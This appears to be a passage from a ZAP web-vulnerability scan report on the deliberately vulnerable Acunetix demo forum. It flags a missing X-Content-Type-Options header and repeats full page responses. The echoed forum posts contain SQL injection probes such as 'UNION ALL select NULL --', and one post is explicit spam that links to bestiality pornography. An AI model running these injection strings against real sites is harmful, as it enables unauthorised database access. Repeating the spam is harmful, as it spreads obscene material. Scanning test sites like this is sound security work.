POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
